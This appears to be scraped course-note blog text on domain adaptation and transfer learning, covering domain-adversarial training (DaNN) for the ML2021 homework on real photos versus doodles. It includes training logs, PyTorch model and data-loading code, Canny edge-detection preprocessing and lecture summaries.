    epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
    epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
    epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
    epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
    epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
    epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
    epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
    epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
    epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
    epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
    epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
    epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
    epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
    epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
    epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
    epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
    epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
    epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
    epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
    epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
    epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
    epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
    epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
    epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
    epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
    epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
    epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
    epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
    epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
    epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
    epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
    epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
    epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
    epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
    epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
    epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
    epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
    epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
    epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
    epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
    epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
    epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
    epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
    epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
    epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
    epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
    epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
    epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
    epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
    epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
    epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
    epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
    epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
    epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
    epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
    epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
    epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
    epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
    epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
    epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
    epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
    epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
    epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
    epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
    epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
    epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
    epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
    epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
    epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
    epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
    epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
    epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
    epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
    epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
    epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
    epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
    epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
    epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
    epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
    epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
    epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
    epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
    epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
    epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
    epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
    epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
    epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
    epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
    epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
    epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
    epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
    epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
    epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
    epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
    epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
    epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
    epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
    epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
    epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
    epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
    epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
    epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
    epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
    epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
    epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
    epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
    epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
    epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
    epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
    epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
    epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
    epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
    epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
    epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
    epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
    epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
    epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
    epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
    epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
    epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
    epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
    epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
    epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
    epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
    epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
    epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
    epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
    epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
    epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
    epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
    epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
    epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
    epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
    epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
    epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
    epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
    epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
    epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
    epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
    epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
    epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
    epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
    epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
    epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
    epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
    epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
    epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
    epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
    epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
    epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
    epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
    epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
    epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

    绘制图表:

    import re
    import matplotlib.pyplot as plt

    # 你的字符串数据
    data = """
    epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    ...
    """

    # 使用正则表达式提取数据
    pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
    matches = re.findall(pattern, data)

    # 转换数据格式
    epochs = []
    d_losses = []
    f_losses = []
    accuracies = []

    for match in matches:
        epoch, d_loss, f_loss, acc = map(float, match)
        epochs.append(int(epoch))
        d_losses.append(d_loss)
        f_losses.append(f_loss)
        accuracies.append(acc)

    # 绘制图表
    plt.figure(figsize=(10, 6))

    # 绘制 D loss 和 F loss
    plt.subplot(2, 1, 1)
    plt.plot(epochs, d_losses, label='D Loss', color='blue')
    plt.plot(epochs, f_losses, label='F Loss', color='orange')
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.title('Train Losses Over Epochs')
    plt.legend()

    # 绘制 Accuracy
    plt.subplot(2, 1, 2)
    plt.plot(epochs, accuracies, label='Accuracy', color='green')
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.title('Accuracy Over Epochs')
    plt.legend()

    plt.tight_layout()
    plt.show()

    png

    推理

    ​我们使用 pandas 生成 csv 文件。

    ​顺便说一句,训练 200 个 epoch 的模型的性能可能不稳定。您可以训练更多 epoch 以获得更稳定的性能。

    # 初始化和设置模型为评估模式
    result = []
    label_predictor.eval()
    feature_extractor.eval()

    # 循环遍历测试数据并进行预测
    for i, (test_data, _) in enumerate(test_dataloader):
    test_data = test_data.cuda()

    class_logits = label_predictor(feature_extractor(test_data))

    x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
    result.append(x)

    import pandas as pd
    result = np.concatenate(result)

    # Generate your submission
    # 合并预测结果
    df = pd.DataFrame({'id': np.arange(0,len(result)), 'label': result})
    df.to_csv('DaNN_submission.csv',index=False)

    可视化

    ​我们使用 t-SNE 图来观察提取特征的分布。

    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import manifold
    ]]>
    + Preparation

[Machine Learning 2021] An Overview of Domain Adaptation

    png

Domain shift: the distributions of the training set and the test set differ. The remedy: domain adaptation.

Transfer learning: ML Lecture 19: Transfer Learning - YouTube

    png

Domain shift comes in three forms:

• The training data and testing data have different input distributions. We call the domain of the training data the source domain, and the domain of the testing data the target domain (this lecture only considers this case).
• The training data and testing data have different label distributions.
• The training data and testing data have different label sets.

    png

Domain Adaptation

If we have some knowledge of the target domain: little but labeled (few samples, but correctly labeled)

• Idea: train a model on the source data, then fine-tune the model on the target data.

• Challenge: there is only limited target data, so be careful about overfitting.

    png

The basic idea of domain adaptation: design a Feature Extractor that extracts features from both the source domain and the target domain, such that the extracted features share the same distribution.

    png

Split the network into two parts: a Feature Extractor and a Label Predictor.

    png

Borrowing the idea of GANs, design a Domain Classifier that performs binary classification on the features produced by the Feature Extractor, judging whether a feature comes from the source domain or the target domain; its objective is $\theta_d^*=\arg\min_{\theta_d}L_d$.

The Label Predictor, $\theta_p^*=\arg\min_{\theta_p}L$, still performs class prediction.

The Feature Extractor must both fool the Domain Classifier and extract features useful for classification: $\theta_f^*=\arg\min_{\theta_f}(L-L_d)$.

    png

The earliest work on domain adversarial training: [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    png

Suppose the current samples fall into two classes. The labeled training set clearly splits into two clusters; for the unlabeled test set, we then want its feature distribution to match the training distribution as closely as possible, as shown in the figure on the right.

    png

Extending this idea to the earlier handwriting-recognition example: feeding in an image yields a vector of per-class probabilities, and we want each test sample to sit as far from the decision boundary as possible. That means its output vector should concentrate on one class, rather than spreading similar probability over all classes.
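One common way to encode this preference for confident, far-from-the-boundary predictions (my own illustrative addition, not from the lecture) is to minimize the entropy of the model's outputs on the unlabeled test data. A minimal PyTorch sketch:

import torch
import torch.nn.functional as F

def entropy_loss(logits):
    # Low entropy = the probability mass concentrates on one class,
    # i.e. the sample lies far from the decision boundary.
    p = F.softmax(logits, dim=1)
    return -(p * F.log_softmax(logits, dim=1)).sum(dim=1).mean()

# Hypothetical usage: add it to the supervised loss on the source data,
# loss = source_class_loss + w * entropy_loss(target_logits)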

    png

Depending on our knowledge of the target domain:

    png

Research on Domain Generalization:

Large training domain, small testing domain: Domain Generalization with Adversarial Feature Learning | IEEE Conference Publication | IEEE Xplore

Small training domain, large testing domain: [1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

ML Lecture 19 - Transfer Learning

    png

Transfer learning covers two situations:

• Similar domain, different tasks
• Different domains, same task

    png

Applications of transfer learning: speech recognition, image recognition, text analysis.

    png

An analogy between graduate students and manga artists:

• graduate student → manga artist
• advisor → editor
• running experiments → drawing storyboards
• submitting to journals → submitting to Jump

    png

For transfer learning, depending on whether the source data (not directly related to the task) and the target data are labelled, the strategies are:

• Target labelled, source labelled: Fine-tuning; Multitask Learning
• Target labelled, source unlabeled: Self-taught learning (icml07-selftaughtlearning.pdf, stanford.edu)
• Target unlabeled, source labelled: Domain-adversarial training; Zero-shot learning
• Target unlabeled, source unlabeled: Self-taught Clustering (icml.dvi, machinelearning.org)

    png

Model Fine-tuning

• Task description

  • Target data: $(x^t, y^t)$, few samples
  • Source data: $(x^s, y^s)$, many samples

• Example: (supervised) speaker adaptation

  • Target data: audio data and its transcriptions from a specific user

  • Source data: audio data and transcriptions from many speakers

• Idea: train a model on the source data, then fine-tune the model on the target data

  • Challenge: only limited target data, so be careful about overfitting

    png

Conservative Training:

• First train a model on the source data.
• Then, rather than simply treating it as a pre-trained model and training a new model directly on the small amount of target data,
• we add a regularization term that keeps the new model's outputs as close as possible to the old model's outputs on the same inputs.
• Why do this? The reason is simple: if we train the new model without this regularizer (also called a constraint term), then feeding the source data into the new model shows it has completely broken; it no longer retains the old model's performance on the source data. This is a recurring and important problem in machine learning: catastrophic forgetting. A minimal code sketch follows below.
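A minimal sketch of such an output-matching regularizer, assuming old_model is the frozen source-trained network and new_model is the copy being fine-tuned (the names and the weight alpha are illustrative, not from the lecture):

import torch
import torch.nn.functional as F

def conservative_loss(new_model, old_model, x, y, alpha=0.1):
    # Task loss on the (small) target-data batch.
    task = F.cross_entropy(new_model(x), y)
    # Regularizer: keep the new model's outputs close to the old
    # model's on the same inputs, so the old behavior is preserved.
    with torch.no_grad():
        old_out = old_model(x)
    reg = F.mse_loss(new_model(x), old_out)
    return task + alpha * reg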

    png

Layer Transfer

• As with conservative training, first train a model on the source data.
• Then copy the parameters of certain layers of that model directly into a new model.
• For the layers of the new model that did not receive copied parameters, keep the transferred layers fixed and train the remaining layers on the target data (see the sketch after this list).
• Finally, if the target data is plentiful enough, we can fine-tune the whole network to squeeze out further performance.
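A minimal PyTorch sketch of layer transfer, assuming both networks expose a transferred backbone named conv and a task head named head (the module names are my own assumption):

import torch

def transfer_and_freeze(src_model, tgt_model):
    # Copy the transferred layers' parameters from the source model.
    tgt_model.conv.load_state_dict(src_model.conv.state_dict())
    # Freeze them so only the remaining layers receive gradients.
    for p in tgt_model.conv.parameters():
        p.requires_grad = False
    # Optimize only the layers that were not transferred.
    return torch.optim.Adam(tgt_model.head.parameters())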

    png

• For speech tasks, one usually copies the last few layers.

• For image tasks, one usually copies the first few layers.

    png

Research on layer transfer:

    png

    png

Multitask Learning

• Recall fine-tuning: there we only care how well the model does on the target domain. Even if feeding source data into the new model shows it has fallen apart, that is acceptable, as long as the new model excels on the target domain.
• Multitask learning is different: it requires the final model to perform well not only on the target domain, but on the source domain as well.

    png

Research on multitask learning for multilingual machine translation: Multi-Task Learning for Multiple Language Translation (aclanthology.org)

    png

    png

Progressive Neural Networks

• The method in this paper is fairly recent. First, train a model for task 1.
• Then feed the output of layer $i$ of the task-1 network into the task-2 network, as an extra input to its layer $i+1$.
• With $k$ networks, the $k$-th network draws on the information of all previous $k-1$ networks.

    png

When the source data and target data lie in different domains (a mismatch):

    png

Domain-adversarial training: design a domain classifier that forces the feature extractor to produce features with the same distribution across domains.

    png

Domain-adversarial training

• The first part, the green feature extractor, extracts features from both the source and target data such that classification based on those features achieves high accuracy. It must also blend the mismatched data together so thoroughly that the domain classifier cannot tell which domain a feature comes from.
• The second part, the blue label predictor, maximizes classification accuracy.
• The third part, the red domain classifier, tries as hard as possible to separate the features produced by the feature extractor, assigning each back to its own domain.

Of course, training this network is easy to describe; in practice, as with GANs, it involves plenty of tricks.

    png

    png

    png

Zero-shot learning: the source data and target data correspond to different tasks.

    png

    png

    png

This is common in NLP, where word embeddings can be used.

    png

    png

    png

Experiments on zero-shot learning: [1312.5650v3] Zero-Shot Learning by Convex Combination of Semantic Embeddings (arxiv.org)

    png

    png

    png

Self-taught learning

• Learning to extract better representations from the source data (an unsupervised approach)
• Extracting better representations for the target data

[Machine Learning 2022] Three Stories of Messing with the Self-Supervised Model BERT

    png

How versatile are self-supervised models?

    png

• Cross-lingual
• Cross-discipline
• Pre-training with artificial data

    Cross-lingual

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Cross-discipline

    png

Using BERT for DNA classification.

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

Pre-training BERT with artificial data

    png

    png

    hw11_domain_adaptation

Scenario and why domain adversarial training

We now have labeled source data and unlabeled target data, where the source data may be related to the target data. We want to train a model using only the source data and test it on the target data.

What could go wrong if we do this? Having studied anomaly detection, we now know that if we test the model on anomalous data that never appeared in the source data, the trained model will very likely perform poorly, because it is unfamiliar with that data.

For example, take a model consisting of a Feature Extractor and a Classifier:

When the model is trained on source data, the Feature Extractor extracts meaningful features because it is familiar with their distribution. As the figure below shows, the blue points (the source-data distribution) already cluster into distinct groups, so the Classifier can predict labels from those clusters.

However, when testing on the target data, the Feature Extractor cannot extract meaningful features that follow the source feature distribution, so the classifier learned for the source domain cannot be applied to the target domain.

Domain Adversarial Training of Neural Networks (DaNN)

Given the problem above, DaNN builds a mapping between the source (training-time) and target (test-time) domains, so that the classifier learned for the source domain can also be applied to the target domain when composed with the learned inter-domain mapping.

In DaNN, the authors add a domain classifier: a deep, discriminatively trained classifier in the training framework that distinguishes data from different domains based on the features the feature extractor produces. As training proceeds, the approach promotes a domain classifier that discriminates between the source and target domains, and a feature extractor whose features are discriminative for the main learning task on the source domain yet indiscriminate with respect to the shift between domains.

The feature extractor is likely to outperform the domain classifier, since the domain classifier's input is generated by the feature extractor, and the tasks of domain classification and label classification are not inherently in conflict.

This approach leads to the emergence of features that are domain-invariant and lie on the same feature distribution.

Data Introduction

Our task has source data (real photos) and target data (hand-drawn doodles).

We will train a model on the photos and their labels, and try to predict the labels of the hand-drawn doodles.

The data can be downloaded here. The code below handles download and visualization.

Note: both the source and target data are balanced; you may use this information.

    # Download dataset
    !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

    # Download from mirrored dataset link
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

    # Unzip the files
    !unzip real_or_drawing.zip
    Streaming output truncated to the last 5000 lines.
    inflating: real_or_drawing/train_data/0/106.bmp
    inflating: real_or_drawing/train_data/0/107.bmp
    inflating: real_or_drawing/train_data/0/108.bmp
    inflating: real_or_drawing/train_data/0/109.bmp
    inflating: real_or_drawing/train_data/0/11.bmp
    ...
import matplotlib.pyplot as plt

def no_axis_show(img, title='', cmap=None):
    # imshow, with the interpolation mode set to "nearest"
    fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
    # do not show the axes in the images
    fig.axes.get_xaxis().set_visible(False)
    fig.axes.get_yaxis().set_visible(False)
    plt.title(title)

titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
plt.figure(figsize=(18, 18))
for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

    png

plt.figure(figsize=(18, 18))
for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

    png

Special Domain Knowledge

When we doodle, we usually draw only outlines, so we can run edge detection on the source data to make it more similar to the target data.

Canny Edge Detection

The implementation of Canny edge detection is as follows. The algorithm is not described in detail here; if you are interested, please refer to the wiki or here.

Implementing Canny edge detection with cv2 only takes two parameters: low_threshold and high_threshold.

    cv2.Canny(image, low_threshold, high_threshold)

Simply put, when an edge response exceeds high_threshold, it is marked as an edge; if it is only above low_threshold, it is kept as an edge only when it connects to a strong edge (hysteresis thresholding).

Let's apply it to the source data.

import cv2
import matplotlib.pyplot as plt

titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
plt.figure(figsize=(18, 18))

original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
plt.subplot(1, 5, 1)
no_axis_show(original_img, title='original')

gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
plt.subplot(1, 5, 2)
no_axis_show(gray_img, title='gray scale', cmap='gray')

canny_50100 = cv2.Canny(gray_img, 50, 100)
plt.subplot(1, 5, 3)
no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

canny_150200 = cv2.Canny(gray_img, 150, 200)
plt.subplot(1, 5, 4)
no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

canny_250300 = cv2.Canny(gray_img, 250, 300)
plt.subplot(1, 5, 5)
no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

    png

Data Processing

The data is organized for torchvision's ImageFolder, so you can create the datasets with torchvision.datasets.ImageFolder. See the comments in the code below for the details of the image augmentation.

import cv2
import numpy as np
import torch                         # tensor operations
import torch.nn as nn                # neural network layers
import torch.nn.functional as F
from torch.autograd import Function  # custom autograd

import torch.optim as optim          # optimizers
import torchvision.transforms as transforms
from torchvision.datasets import ImageFolder
from torch.utils.data import DataLoader

# source_transform runs Canny edge detection, then applies augmentations
# such as flips and rotations.
source_transform = transforms.Compose([
    # Turn RGB to grayscale (because Canny does not support RGB images).
    transforms.Grayscale(),
    # cv2 does not accept PIL images, so convert to np.array first,
    # then apply the cv2.Canny algorithm.
    transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)),
    # Transform the np.array back to a PIL image.
    transforms.ToPILImage(),
    # 50% horizontal flip (for augmentation).
    transforms.RandomHorizontalFlip(),
    # Rotate ±15 degrees (for augmentation), filling empty pixels
    # after rotation with zero.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
])

# target_transform skips edge detection, but resizes the images
# (from 28x28 to 32x32) to match the training data.
target_transform = transforms.Compose([
    # Turn RGB to grayscale.
    transforms.Grayscale(),
    # Resize: source images are 32x32, so enlarge the target
    # images from 28x28 to 32x32.
    transforms.Resize((32, 32)),
    # 50% horizontal flip (for augmentation).
    transforms.RandomHorizontalFlip(),
    # Rotate ±15 degrees (for augmentation), filling empty pixels with zero.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
])

# ImageFolder loads the image folders from the given paths and applies
# source_transform / target_transform to the images.
source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

# The DataLoaders feed the data to the model in batches.
# batch_size=32 gives 32 images per batch; shuffle=True randomizes the
# training order, which helps reduce overfitting.
# test_dataloader loads the test data with shuffle=False, preserving order.
source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)

Model

Feature Extractor: a classic VGG-like architecture.

Label Predictor / Domain Classifier: linear models.

class FeatureExtractor(nn.Module):

    def __init__(self):
        super(FeatureExtractor, self).__init__()

        # FeatureExtractor is a CNN that extracts high-level features from
        # the input image. It stacks 5 convolutional blocks, each built from:
        self.conv = nn.Sequential(
            nn.Conv2d(1, 64, 3, 1, 1),   # a convolution (Conv2d) extracting spatial features
            nn.BatchNorm2d(64),          # batch normalization (BatchNorm2d) to stabilize training
            nn.ReLU(),                   # ReLU activation for non-linearity
            nn.MaxPool2d(2),             # max pooling (MaxPool2d) to downsample the feature map

            nn.Conv2d(64, 128, 3, 1, 1),
            nn.BatchNorm2d(128),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(128, 256, 3, 1, 1),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(256, 256, 3, 1, 1),
            nn.BatchNorm2d(256),
            nn.ReLU(),
            nn.MaxPool2d(2),

            nn.Conv2d(256, 512, 3, 1, 1),
            nn.BatchNorm2d(512),
            nn.ReLU(),
            nn.MaxPool2d(2)
        )

    def forward(self, x):
        x = self.conv(x).squeeze()
        return x

class LabelPredictor(nn.Module):

    def __init__(self):
        super(LabelPredictor, self).__init__()

        self.layer = nn.Sequential(
            nn.Linear(512, 512),  # the first two layers are 512-in/512-out fully connected layers with ReLU
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.ReLU(),

            nn.Linear(512, 10),   # the last layer outputs 10 values for classification
        )

    def forward(self, h):
        c = self.layer(h)
        return c

class DomainClassifier(nn.Module):

    def __init__(self):
        super(DomainClassifier, self).__init__()

        self.layer = nn.Sequential(
            nn.Linear(512, 512),  # each hidden layer is followed by BatchNorm1d and ReLU
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 512),
            nn.BatchNorm1d(512),
            nn.ReLU(),

            nn.Linear(512, 1),    # a single-neuron output layer predicting the domain label
        )

    def forward(self, h):
        y = self.layer(h)
        return y

Preprocessing

Here we use Adam as our optimizer.

# Initialize the models and move them to the GPU
feature_extractor = FeatureExtractor().cuda()
label_predictor = LabelPredictor().cuda()
domain_classifier = DomainClassifier().cuda()

